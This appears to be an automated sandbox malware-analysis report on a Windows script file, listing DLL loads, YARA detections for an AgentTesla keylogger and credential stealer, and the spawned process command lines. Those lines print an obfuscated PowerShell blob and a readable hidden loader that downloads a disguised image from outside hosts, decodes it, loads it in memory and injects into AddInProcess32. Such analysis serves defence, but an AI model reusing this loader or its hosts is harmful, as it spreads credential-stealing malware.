Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior

Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2992, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winWSF@8/6@3/5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0nlq4op.4uo.ps1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rdevuelto_Pagos.wsf"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

